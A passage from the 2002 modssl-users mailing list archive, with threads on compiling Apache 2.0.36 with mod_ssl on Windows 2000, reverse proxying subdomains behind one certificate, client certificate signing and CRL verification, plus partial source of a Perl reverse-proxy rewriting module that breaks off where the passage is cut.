> >>>User Support Mailing List                      modssl-users@modssl.org
> >>>Automated List Manager                            majordomo@modssl.org
> >>>
> >>>
> >>>
> >>>
> >>______________________________________________________________________
> >>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >>User Support Mailing List                      modssl-users@modssl.org
> >>Automated List Manager                            majordomo@modssl.org
> >>
> >>
> >
> >--
> >------
> >Adverteren.be - 100% Nederlandstalig adverteren op kwalitatief hoogstaande
> >sites !
> >
> >
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >
> >-
> >
> >NOTICE: The information contained in this email and any attachments is
> >confidential and may be legally privileged. If you are not the
> >intended recipient you are hereby notified that you must not use,
> >disclose, distribute, copy, print or rely on this email's content. If
> >you are not the intended recipient, please notify the sender
> >immediately and then delete the email and any attachments from your
> >system.
> >
> >RNIB has made strenuous efforts to ensure that emails and any
> >attachments generated by its staff are free from viruses. However, it
> >cannot accept any responsibility for any viruses which are
> >transmitted. We therefore recommend you scan all attachments.
> >
> >Please note that the statements and views expressed in this email
> >and any attachments are those of the author and do not necessarily
> >represent those of RNIB.
> >
> >RNIB Registered Charity Number: 226227
> >
> >Website: http://www.rnib.org.uk
> >
> >14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to
> >find out all about it.
> >
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >
> >
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

--
------
Adverteren.be - 100% Nederlandstalig adverteren op kwalitatief hoogstaande sites
!


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 14:11:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA21097; Wed, 12 Jun 2002 14:10:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.espgroup.net id OAA21037; Wed, 12 Jun 2002 14:09:44 +0200 (MET DST)
Received: from no.name.available by mail.espgroup.net
          via smtpd (for opensource-01.ee.ethz.ch [129.132.7.153]) with SMTP; 12 Jun 2002 12:08:51 UT
Received: (private information removed)
Received: from [63.66.134.226] by brickwall.espgroup.net
          via smtpd (for [10.3.1.2]) with SMTP; 12 Jun 2002 12:08:49 UT
Message-ID: <3D073AEF.5020909@espgroup.net>
Date: Wed, 12 Jun 2002 08:13:35 -0400
From: "Dwayne Miller" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0rc1) Gecko/20020417
X-Accept-Language: en,pdf
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money
References: <5.1.0.14.0.20020611124908.00b1e798@mail.unitec.edu.ve> <033c01c211ab$b97a1220$6401a8c0@bohr>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dwayne Miller" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I just recently built the 2.0.36 + ssl tree and had similar results. 
 Although the error messages were slightly different, the root cause 
might be the same.

Turns out that several .c and .h files are delivered with dates earlier 
than the .y and .l files they are built from.  However, the .c and .h 
files are actually up-to-date.  So, by simply 'touching' (I used an 
editor to add a blank line) to the .c and .h files to make their dates 
more recent than their source files, and the system will not try to 
build them again.  (I thought that I read that this problem had been 
corrected in the 2.0.36 tree, but apparently not).

Anyway,  I also had to uninstall the bison utility (I did not have the 
other required tools, lex, sed and yacc anyway) before this would 
actually work.  Having bison on my system, even with the modified file 
dates, would still cause an error for some reason.  Removing bison and 
altering the file dates allowed the build to work as expected.

The files that you need to 'touch' are
ssl_expr_parse.c
ssl_expr_parse.h
ssl_expr_scan.c

Since you have run the make with errors, you will probably have to 
reinstall these files from the distribution before running make again. 
 They might have been emptied as a result of your failed make.

Hope this helps

Phil Smiley wrote:

>I've included the following libs with the results I soecified below.
>
>kernel32.lib user32.lib wsock32.lib ws2_32.lib advapi32.lib gdi32.lib
>ssleay32.lib libeay32.lib libapr.lib libaprutil.lib libhttpd.lib
>
>I also included the directories with the openssl libraries.  Same result.
>
>Thanks; Phil
>
>----- Original Message -----
>From: "Victor Medina" 
>To: 
>Sent: Tuesday, June 11, 2002 11:52 AM
>Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money
>
>
>  
>
>>Most probably you haven´t add path to the ssl dll´s or lib inside VS, go
>>    
>>
>to
>  
>
>>tools\configure\directories and add the path to the include and bin
>>    
>>
>folders
>  
>
>>of your OpenSSL installation this should work just fine
>>
>>Best Regards
>>
>>Victor Medina
>>Universidad Tecnologica del Centro
>>Valencia-Venezuela
>>(http://www.unitec.edu.ve)
>>
>>
>>
>>At 12:05 AM 6/11/2002 -0500, you wrote:
>>
>>    
>>
>>>I've successfully compiled Apacche 2.0.36 and openssl as this thread
>>>describes.  I'm encountering problems building modssl though.  When I try
>>>to use NMAKE /f "mod_ssl.mak" CFG="mod_ssl - Win32 Release", i get the
>>>following:
>>>        link.exe @C:\DOCUME~1\ADMINI~1.000\LOCALS~1\Temp\nma02752.
>>>   Creating library .\Release\libapr.lib and object .\Release\libapr.exp
>>>        cd "..\..\modules\ssl"
>>>        tempfile.bat
>>>The system cannot find the file specified.
>>>Could Not Find C:\httpd-2.0.36\modules\ssl\y.tab.c
>>>The system cannot find the file specified.
>>>Could Not Find C:\httpd-2.0.36\modules\ssl\y.tab.h
>>>NMAKE : fatal error U1077: 'tempfile.bat' : return code '0x1'
>>>Stop.
>>>I didn't find these files anywhere in the apache or openssl directories.
>>>
>>>When I used VC++, I get:
>>>Linking...
>>>   Creating library Debug/mod_ssl.lib and object Debug/mod_ssl.exp
>>>ssl_expr_scan.obj : error LNK2001: unresolved external symbol _ap_pstrdup
>>>Debug/mod_ssl.so : fatal error LNK1120: 1 unresolved externals
>>>Error executing link.exe.
>>>mod_ssl.so - 2 error(s), 0 warning(s)
>>>I'm sure its something obvious that I've overlooked.  Does anyone have
>>>      
>>>
>any
>  
>
>>>suggestions?
>>>
>>>Thanks; Phil
>>>
>>>Thanks everyone, we now have everything working fine.
>>>
>>>A quick howto for beginners (who perhaps experience what we have
>>>experienced):
>>>
>>>If you want win2k + mod-ssl, don't trust the apache HOWTO at
>>>http://httpd.apache.org/docs-2.0/platform/win_compiling.html, they may
>>>be fine for those who don't need ssl (and those people can simply use
>>>the supplied binaries) but they are wrong if you need ssl.
>>>
>>>Firstly, don't use the perl examples given on apache.org to prepare and
>>>compile openssl, use the instructions in INSTALL.W32 that comes with the
>>>openSSL source.
>>>
>>>We eventually found that with visual C++ 6 we could compile apache
>>>without ssl fine. Later we compiled mod-ssl alone (also in VC++) and
>>>moved the mod-ssl.so binary to the modules folder in the apache
>>>installation.
>>>
>>>And that's it, except you need to know how to start Apache in "ssl
>>>mode".
>>>
>>>      
>>>
>>>from the console in the apache\bin use
>>    
>>
>>>>apache -D SSL
>>>>        
>>>>
>>>to install apache to run as a service with SSL
>>>
>>>      
>>>
>>>>apache -i -D SSL
>>>>        
>>>>
>>>Hope this helps someone out there, and thanks to everyone who helped us!
>>>
>>>John.
>>>
>>>
>>>
>>>
>>>
>>>----- Original Message -----
>>>From: "Mark Chew" 
>>>To: 
>>>Sent: Monday, June 10, 2002 7:11 PM
>>>Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money
>>>
>>>
>>>: Assuming the win2k service for Apache is created
>>>: (else create one using sc command),
>>>: try configure the Apache service properties like this :
>>>:
>>>: Path to executable:
>>>: "C:\Program Files\Apache Group\Apache\Apache.exe" --ntservice
>>>:
>>>: Startup type:
>>>: Automatic
>>>:
>>>:
>>>:
>>>: Regards,
>>>: Mark
>>>:
>>>:
>>>: >From: "John" 
>>>: >Reply-To: modssl-users@modssl.org
>>>: >To: 
>>>: >Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money
>>>: >Date: Mon, 10 Jun 2002 17:20:20 +1200
>>>: >
>>>: >We have discovered that if we start Apache from the console with
>>>: > >apache -D SSL on our windows server, then we have ssl support...
>>>: >Please, someone, how do we get ssl support running as a service?
>>>: >
>>>: >It seems we have wasted a couple of days, simply to find this out!
>>>: >
>>>: >John.
>>>: >
>>>: >
>>>: >
>>>: >
>>>:
>>>      
>>>
>>>>______________________________________________________________________
>>>>        
>>>>
>>>: >Apache Interface to OpenSSL (mod_ssl)
>>>www.modssl.org
>>>: >User Support Mailing List
>>>modssl-users@modssl.org
>>>: >Automated List Manager
>>>majordomo@modssl.org
>>>:
>>>:
>>>:
>>>:
>>>: _________________________________________________________________
>>>: Chat with friends online, try MSN Messenger: http://messenger.msn.com
>>>:
>>>: ______________________________________________________________________
>>>: Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>>: User Support Mailing List                      modssl-users@modssl.org
>>>: Automated List Manager                            majordomo@modssl.org
>>>:
>>>
>>>______________________________________________________________________
>>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>>User Support Mailing List                      modssl-users@modssl.org
>>>Automated List
>>>Manager
>>>majordomo@modssl.org
>>>      
>>>
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>    
>>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 14:37:01 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA22624; Wed, 12 Jun 2002 14:35:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id OAA22581; Wed, 12 Jun 2002 14:35:06 +0200 (MET DST)
Received: from itaction.co.uk ([194.106.52.27]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id GXLEYG00.5UC for ; Wed, 12 Jun 2002
          13:35:04 +0100 
Message-ID: <3D073FF8.3080801@itaction.co.uk>
Date: Wed, 12 Jun 2002 13:35:04 +0100
From: "Peter Viertel" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0+) Gecko/20020430
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: 1 certificate for several sites using redirection ?
References: <9B66BBD37D5DD411B8CE00508B69700F020671CC@pborolocal.rnib.org.uk> <3D073574.3060301@itaction.co.uk> <3D0739D7.9657779A@godden.net>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

thats basically right.

the proxy spec in http/1.1 etc copes with rewriting headers - but 
nothing I've seen rewrites the actual html content - this would be 
possible of course, but there would have to be a new module for apache 
to do it, and architecturally you'd be creating a potential bottleneck 
as the proxy server would have to parse all of the content passing 
through it.

Wim Godden wrote:

>So there's no system which allows me to really proxy pages and 'modify' them so
>that all future connections go through this 'proxy' as well ?
>
>Greetings,
>
>Wim
>
>Peter Viertel wrote:
>
>  
>
>>yes, i think thats whats happening - you need to review the website
>>content you are pointing at. For this to work you can't have any
>>absolute hrefs, and also the backend site may issue redirects, for these
>>to work you need a ProxyPassReverse which will rewrite the Location:
>>header on any redirects the backend site may send.
>>
>> For example:
>>
>>ProxyPass /test    http://other.subdomain.ourdomain.com/
>>ProxyPassReverse /test  http://other.subdomain.ourdomain.com/
>>
>>proxypassreverse unfortunately is not case insensitive, and the backend
>>webserver may refer to itself canonically, so the location headers may
>>have another hostname. Either fix up the backend webserver to match the
>>proxypassreverse, or add extra proxypassreverse lines.
>>
>>The most common cause of redirects is the / bug handlers of tomcat, and
>>IIS which kick in if your url ends with / and that resolves to a
>>directory, then the webserver looks up what the directoryindex script is
>>(eg. index.html) and sends a redirect. This is something to do with
>>early revision browser releases, I have no idea which ones or if it
>>matters anymore.
>>
>>Also note that mod_proxy got a big upgrade at apache release 1.3.23 that
>>may help things along too in certain cases.
>>
>>John.Airey@rnib.org.uk wrote:
>>
>>    
>>
>>>Sounds like you have some absolute links rather than relative links. You can
>>>also use
>>>proxypass /test https://other-subdomain.ourdomain.com
>>>
>>>If the data needs to be secured between the proxy and the destination
>>>server.
>>>
>>>-
>>>John Airey
>>>Internet systems support officer, ITCSD, Royal National Institute of the
>>>Blind,
>>>Bakewell Road, Peterborough PE2 6XU,
>>>Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk
>>>
>>>Is the statement 'There is no such thing as truth'  true?
>>>
>>>
>>>
>>>
>>>      
>>>
>>>>-----Original Message-----
>>>>From: Wim Godden [mailto:wim@godden.net]
>>>>Sent: 12 June 2002 11:06
>>>>To: modssl-users@modssl.org
>>>>Subject: Re: 1 certificate for several sites using redirection ?
>>>>
>>>>
>>>>proxypass /test http://other-subdomain.ourdomain.com
>>>>doesn't work properly... I get errors about the images being
>>>>insecure and all links
>>>>point to the wrong position.
>>>>
>>>>
>>>>Peter Viertel wrote:
>>>>
>>>>
>>>>
>>>>        
>>>>
>>>>>You could do that using reverse proxy, ie mod_proxy.
>>>>>Redirects are not going to help.
>>>>>
>>>>>Wim Godden wrote:
>>>>>
>>>>>
>>>>>
>>>>>          
>>>>>
>>>>>>Hi,
>>>>>>
>>>>>>I'd like to use a certificate to secure several of our
>>>>>>
>>>>>>
>>>>>>            
>>>>>>
>>>>subdomains...
>>>>
>>>>
>>>>        
>>>>
>>>>>>buying hundreds of certificates is simply too expensive.
>>>>>>Is there some way to do this :
>>>>>>
>>>>>>- Install certificate on secure.ourdomain.com
>>>>>>- Let people surf to
>>>>>>
>>>>>>
>>>>>>            
>>>>>>
>>>>>https://secure.ourdomain.com/other-subdomain.ourdomain.com/wh
>>>>>
>>>>>
>>>>>          
>>>>>
>>>at-ever-page.html
>>>
>>>
>>>      
>>>
>>>>>Thanks in advance.
>>>>>
>>>>>
>>>>>Greetings,
>>>>>
>>>>>Wim Godden
>>>>>
>>>>>______________________________________________________________________
>>>>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>>>>User Support Mailing List                      modssl-users@modssl.org
>>>>>Automated List Manager                            majordomo@modssl.org
>>>>>
>>>>>
>>>>>
>>>>>
>>>>>          
>>>>>
>>>>______________________________________________________________________
>>>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>>>User Support Mailing List                      modssl-users@modssl.org
>>>>Automated List Manager                            majordomo@modssl.org
>>>>
>>>>
>>>>        
>>>>
>>>--
>>>------
>>>Adverteren.be - 100% Nederlandstalig adverteren op kwalitatief hoogstaande
>>>sites !
>>>
>>>
>>>______________________________________________________________________
>>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>>User Support Mailing List                      modssl-users@modssl.org
>>>Automated List Manager                            majordomo@modssl.org
>>>
>>>-
>>>
>>>NOTICE: The information contained in this email and any attachments is
>>>confidential and may be legally privileged. If you are not the
>>>intended recipient you are hereby notified that you must not use,
>>>disclose, distribute, copy, print or rely on this email's content. If
>>>you are not the intended recipient, please notify the sender
>>>immediately and then delete the email and any attachments from your
>>>system.
>>>
>>>RNIB has made strenuous efforts to ensure that emails and any
>>>attachments generated by its staff are free from viruses. However, it
>>>cannot accept any responsibility for any viruses which are
>>>transmitted. We therefore recommend you scan all attachments.
>>>
>>>Please note that the statements and views expressed in this email
>>>and any attachments are those of the author and do not necessarily
>>>represent those of RNIB.
>>>
>>>RNIB Registered Charity Number: 226227
>>>
>>>Website: http://www.rnib.org.uk
>>>
>>>14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to
>>>find out all about it.
>>>
>>>______________________________________________________________________
>>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>>User Support Mailing List                      modssl-users@modssl.org
>>>Automated List Manager                            majordomo@modssl.org
>>>
>>>
>>>      
>>>
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>    
>>
>
>--
>------
>Adverteren.be - 100% Nederlandstalig adverteren op kwalitatief hoogstaande sites
>!
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 16:10:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA28727; Wed, 12 Jun 2002 16:09:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bb35239.bpbfinance.com id QAA28686; Wed, 12 Jun 2002 16:08:25 +0200 (MET DST)
Received: from bb35239 (root@localhost)
	by bb35239.bpbfinance.com (8.8.8+Sun/8.8.8) with ESMTP id QAA15173
	for ; Wed, 12 Jun 2002 16:08:09 +0100 (GMT)
Received: from sol-tec.it (userinterno.bpbfinance.it 10.72.35.1)
        by bb35239 (OpenMail SMTP Relay B.07.00.d0)
        via ESMTP; Wed, 12 Jun 2002 16:08:10 +0100 (GMT)
Message-ID: <3D07562D.8000307@sol-tec.it>
Date: Wed, 12 Jun 2002 16:09:49 +0200
From: Giovanni Giorgi 
User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Testing SSLv3 Authentication
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Giovanni Giorgi 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

  Excuse me,
    I have installed mod_ssl.
I must authenticate known clients based on certificate and **I need to 
test this feature.
I have installed a self-signed crt using something like

#   require a client certificate which has to be directly
#   signed by our CA certificate in ca.crt
SSLVerifyClient require
SSLVerifyDepth 1
SSLCACertificateFile conf/ssl.crt/ca.crt

How can I build the client certificate to install on the browser?
Can I build a second client.crt and then sign it with the ca.crt?

I have signed the client.crt with

 openssl x509 -req -days 365 -in client.csr  -signkey ca.private.key -out client.crt 

Is it right? Or must I  use the CA.pl script ?

Thank you

-- 
// Giovanni Giorgi  First, they ignore you, then they laugh at you,
//                   then they fight you. Then you win
// Sol-Tec s.r.l.           Mahatma Ghandi


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 16:30:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA29695; Wed, 12 Jun 2002 16:29:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from intramed1.gip-cps.fr id QAA29673; Wed, 12 Jun 2002 16:28:47 +0200 (MET DST)
Received: from gipnt.gip-cps.fr (unverified) by intramed1.gip-cps.fr
 (Content Technologies SMTPRS 2.0.15) with ESMTP id  for ;
 mer., 12 juin 2002 16:28:57 +0200
Received: by GIPNT with Internet Mail Service (5.5.2650.21)
	id ; Wed, 12 Jun 2002 16:35:58 +0200
Message-Id: <21DC528204CCD211A89100E0292B7B16C00F5C@GIPNT>
From: "JOURDAIN, Philippe" 
To: modssl-users@modssl.org
Subject: Invalid signature on CRL
Date: Wed, 12 Jun 2002 16:35:57 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "JOURDAIN, Philippe" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

My case: 
We have an AC with 2 public keys, one is used to sign our SmartCard
certificate and the other is used to sign the CRL according to the SmartCard
certificate.
The DN is the same for the both keys but the Subject Key Identifier are
differents. 
When you look into the certificat and the CRL, you have then two differents
Authority Key Identifier. 
We are 100% X509v3 compliant in our certificate structure. 

When I want to authenticate a Client certificate, I have this message :
Invalid signature on CRL.
I know Why. In the pkg.sslmod/ssl_engine_kernel.c file, in the function
ssl_callback_SSLVerify_CRL() there is this part : 

/* * Verify the signature on this CRL */ 
if (X509_CRL_verify(crl, X509_get_pubkey(xs)) <= 0) 
{
	ssl_log(s, SSL_LOG_WARN, "Invalid signature on CRL"); 
	X509_STORE_CTX_set_error(ctx, X509_V_ERR_CRL_SIGNATURE_FAILURE); 
	X509_OBJECT_free_contents(&obj);
	return FALSE;
} 

I suppose that it means, You check the CRL signature with the AC who signed
the client certificate.
Which is wrong in my case.
The X509v3 RFC allow to sign the CRL with another key (with same DN).
We are, maybe, the only in the world who are using this functionality but
it's in the STANDARD. 

Because, I am not a C programmer and I have no skills in it.
The C code need to be updated to manage this case.
Can you help me ?

Kind Regards,
Philippe Jourdain (mailto:p.jourdain@gip-cps.fr)
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 16:35:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA29975; Wed, 12 Jun 2002 16:34:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange00.SC.ESILICON.COM id QAA29929; Wed, 12 Jun 2002 16:33:18 +0200 (MET DST)
Received: by exchange00.SC.ESILICON.COM with Internet Mail Service (5.5.2653.19)
	id ; Wed, 12 Jun 2002 07:33:11 -0700
Message-ID: <691874941F1F954198F7E7FCBAEF1FAE0D1FF8@exchange00.SC.ESILICON.COM>
From: David Marshall 
To: "'modssl-users@modssl.org'" 
Subject: RE: 1 certificate for several sites using redirection ?
Date: Wed, 12 Jun 2002 07:33:10 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Marshall 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

To rewrite content you might look at the Perl module Apache::ProxyRewrite. I
was given an assignment to Front-end MS EXCHANGE OWA with Apache HTTPS.
After review of options, I took a copy of the Perl module
Apache::ProxyRewrite and added the ability to ReplaceText in the content as
well, I renamed it ProxyRewriteReplace. This was my 1st excursion into Perl
and I've never gotten the time to fully complete/test the module (example,
the documentation is from ProxyReplace). I also only tested it as far as to
meet our objective of Proxying MS Exchange. I don;t know if this will help,
but I've included my ProxyRewriteReplace source.

To solve Bottlenecks, we run a loadbalancer in front of a balanced set of
identically configured proxy servers. But it is surprising how fast content
can be rewritten. In our case content is only re-written by Location, so
bottlenecks are limited to what needs to be re-rwitten.

Here is an example useage proxying MS Exchange 5.5 OWA. In the example,
External DNS for svr.com resolves to the load balancer(s). Internal DNS (or
/etc/hosts) resolves svr.com to the real MS Exchange OWA server. We run a
firewall between the proxy server and the MS Exchange server.

 
    SetHandler   perl-script
    PerlHandler  Apache::ProxyRewriteReplace

    PerlSetVar   ProxyTo           http://svr.com/exchange
    PerlSetVar   ProxyAuthRedirect Off
    PerlSetVar   ProxyShrinkURI    On
    PerlSetVar   ProxyReplaceText  "http://svr.com => https://svr.com"
 

 
    SetHandler   perl-script
    PerlHandler  Apache::ProxyRewriteReplace

    PerlSetVar   ProxyTo           http://svr.com/exchweb
    PerlSetVar   ProxyAuthRedirect Off
    PerlSetVar   ProxyShrinkURI    On
    PerlSetVar   ProxyReplaceText  "http://svr.com => https://svr.com"
 

Hope this is useful
David Marshall


# $Id: ProxyRewriteReplace.pm,v 0.01 2001/10/22 20:45:44 dmarshall Exp $
#
# Author          : David Marshall (From ProxyRewrite)
# Created On      : Oct 22 12:04:00 CDT 2001
# Status          : Functional
# 
# PURPOSE
#    Proxy requests 
#    1. rewrite embedded URLs according to configuration
#    2. replace embedded proxied text according to configuration
#
############################################################################
###

# Package name
package Apache::ProxyRewriteReplace;

# Required libraries
use strict;
use Apache;
use Apache::Constants qw(OK AUTH_REQUIRED DECLINED DONE);
use Apache::Log;
use Apache::URI;
use LWP::UserAgent;
use URI::Escape qw(uri_unescape);

# Global variables
$Apache::ProxyRewriteReplace::VERSION = '0.1';
$Apache::ProxyRewriteReplace::PRODUCT = 'ProxyRewriteReplace/' .
$Apache::ProxyRewriteReplace::VERSION;
my %LINK_ELEMENTS =
( # These represent all the possible valid tags that have links in them
 'a'       => 'href',
 'applet'  => {
               'archive'    => 1,
               'code'       => 1,
               'codebase'   => 1,
              },
 'area'    => 'href',
 'base'    => 'href',
 'body'    => 'background',
 'embed'   => 'src',
 'form'    => 'action',
 'frame'   => 'src',
 'img'     => {
               'src'        => 1,
               'lowsrc'     => 1,
               'usemap'     => 1,
              },
 'input'   => 'src',
 'isindex' => 'action',
 'link'    => {
               'href'       => 1,
               'src'        => 1,
              },
 'meta'    => {
               'content'    => 1,
               'http-equiv' => 1,
              },
 'object'  => {
               'classid'    => 1,
               'codebase'   => 1,
               'data'       => 1,
               'name'       => 1,
               'usemap'     => 1,
              },
 'script'  => 'src',
 'td'      => 'background',
 'th'      => 'background',
 'tr'      => 'background',
);


############################################################################
###
############################################################################
###
# handler: hook into Apache/mod_perl API
############################################################################
###
############################################################################
###
sub handler {
  my $r = shift;
  my %mappings = ();
  my %text_replacements = ();
  my ($auth_info, $auth_redirect, $remote_location, $shrink_uri) = undef;

  %mappings = split(/\s*(?:=>|,)\s*/, $r->dir_config('ProxyRewriteURI'));
  %text_replacements = split(/\s*(?:=>|,)\s*/,
$r->dir_config('ProxyReplaceText'));
  $auth_info = $r->dir_config('ProxyAuthInfo');
  $auth_redirect = $r->dir_config('ProxyAuthRedirect') || 'Off';
  $shrink_uri = $r->dir_config('ProxyShrinkURI') || 'Off';
  if ($r->dir_config('ProxyTo')) {
    $remote_location = $r->dir_config('ProxyTo');
  } else {
    $r->log->error("ProxyRewriteReplace::handler: ProxyTo directive must be
defined");
    return DECLINED;
  }

  # Automatically add a mapping for the remote relative URI and the
  # current location. Also capture remote site information.
  $remote_location =~ m!^([^:]+://[^/]+)(/?.*)!;
  my $remote_site = $1;
  if ($2) {
    $mappings{$2} = $r->location;
  } elsif ($r->location eq '/') {
    $mappings{'/'} = $r->location;
  } else {
    $mappings{'/'} = $r->location . '/';
  }

  $r->log->debug("handler: Remote Site - $remote_site");
  $r->log->debug("handler: Remote Location - $remote_location");
  $r->log->debug("handler: Auth Info - $auth_info");
  $r->log->debug("handler: Shrink URI - $shrink_uri");
  foreach (keys(%mappings)) {
    $r->log->debug("handler: Mapping $_ to $mappings{$_}");
  }
  foreach (keys(%text_replacements)) {
    $r->log->debug("handler: Text Replacements $_ to
$text_replacements{$_}");
  }

  # fetch URL
  $r->log->info("ProxyRewriteReplace: Preparing to fetch ", $r->uri, 
		" at time ", time);
  my $response = &fetch($r, $remote_location, $auth_info);

  # rewrite response URIs as needed
  $r->log->info("ProxyRewriteReplace: Preparing to rewrite URIs for ",
$r->uri, 
		" at time ", time);
  if ($response->header('Content-type') =~ m!^text/html!) {
	$r->log->debug("handler: text/html found");
    &parse($r, $remote_site, $response, $shrink_uri, \%mappings);
  }

  # respond to client
  $r->log->info("ProxyRewriteReplace: Preparing to respond for ", $r->uri, 
		" at time ", time);
  &respond($r, $remote_site, $remote_location, $auth_redirect, 
	   $response, \%mappings, \%text_replacements );

  return OK;
}

############################################################################
###
############################################################################
###
# fetch: fetch the remote URL and return a reference to the response object
############################################################################
###
############################################################################
###
sub fetch {
  my ($r, $remote_location, $auth_info) = @_;
  my $client_agent = '';
  my $my_uri = '';
  my ($k, $v);
  my $base = $r->location();
  my $args = $r->args();
  if ($base ne '/') {
    ($my_uri = $r->uri) =~ s/^$base//;
  } else {
    $my_uri = $r->uri;
  }
  $my_uri = $remote_location . $my_uri;
  $my_uri .= '?' . $r->args() if $args;

  my $request = HTTP::Request->new($r->method, $my_uri);
  
  $r->log->info("ProxyRewriteReplace::fetch: Time proxy request method
created: ", time);
  $r->log->debug("fetch: Base URI (aka location section): $base");
  $r->log->info("ProxyRewriteReplace::fetch: Request for $my_uri with method
", $r->method);

  my(%headers_in) = $r->headers_in;
  while(($k,$v) = each %headers_in) {
    # HACK to force no Keep-Alives on the connection between proxy
    # and remote server
    $r->log->debug("fetch: IN $k: $v");
    if ($k =~ /Connection/) {
      $v = "Close";
    } elsif ($k =~ /Host/) {
      ($v) = ($remote_location =~ m!://([^/]+)!);
